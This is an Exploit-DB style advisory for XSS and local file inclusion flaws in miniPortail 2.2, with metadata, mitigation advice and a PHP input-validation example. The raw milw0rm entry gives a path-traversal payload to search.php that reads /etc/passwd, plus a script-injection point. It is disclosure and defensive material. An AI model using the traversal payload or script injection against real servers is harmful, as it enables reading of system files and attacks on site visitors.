Vendor: miniPortail
By: StAkeR
CVSS: 7.5 (HIGH)
Cross Site Scripting (XSS) and Local File Inclusion (LFI)
CWE: 79, 22
Product Name: miniPortail
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities

By exploiting the XSS vulnerability, an attacker can inject malicious JavaScript code into the search.php page, which is then executed in the victim's browser. The Local File Inclusion vulnerability lets an attacker read arbitrary files from the server.

Mitigation:

Input validation should be used to prevent XSS and LFI attacks. Additionally, access to sensitive files should be restricted.
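
One way to apply the input validation described above to the two search.php inputs, as an added example in PHP that is not miniPortail's code or part of the original advisory. It assumes the lng value selects a file under a lang/ directory and that the POSTed search field is named search; those names and the helpers resolve_lang_file() and h() are hypothetical.

```php
<?php
// Added example, not miniPortail code. Assumptions: language files live in
// ./lang/<code>.php and the POSTed search field is named "search".

const LANG_DIR = __DIR__ . '/lang';
const DEFAULT_LANG = 'en';

/**
 * Map the untrusted lng value to a language file inside LANG_DIR,
 * falling back to the default when it is not a well-formed language code.
 */
function resolve_lang_file($lng): string
{
    $fallback = LANG_DIR . '/' . DEFAULT_LANG . '.php';

    // Arrays (lng[]=x), NUL bytes, slashes and dots all fail this pattern,
    // so a value like "../../etc/passwd%00" never reaches the filesystem.
    if (!is_string($lng) || !preg_match('/\A[a-z]{2}(_[A-Z]{2})?\z/', $lng)) {
        return $fallback;
    }

    // Defence in depth: the resolved path must exist and stay under LANG_DIR.
    $base = realpath(LANG_DIR);
    $path = realpath(LANG_DIR . '/' . $lng . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return $fallback;
    }
    return $path;
}

/** Encode untrusted text for HTML element and quoted-attribute contexts. */
function h($value): string
{
    return htmlspecialchars(is_string($value) ? $value : '', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$langFile = resolve_lang_file($_GET['lng'] ?? DEFAULT_LANG);
if (is_file($langFile)) {
    require $langFile;
}

// The search term is echoed back only after encoding, so markup in it is inert.
$term = $_POST['search'] ?? '';
echo '<p>Results for: ', h($term), '</p>';
```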

Exploit-DB raw data:

/*

   miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities
   -------------------------------------------------------
   By StAkeR - StAkeR[at]hotmail[dot]it
   http://www.easy-script.com/scripts-dl/miniportail.zip
   -------------------------------------------------------
   
   -1 Local File Inclusion
   -  search.php?lng=../../../../../../etc/passwd%00
   
   -2 Cross Site Scripting (POST)
   -  search.php (<script>[javascript]</script>)
   
*/

# milw0rm.com [2008-10-23]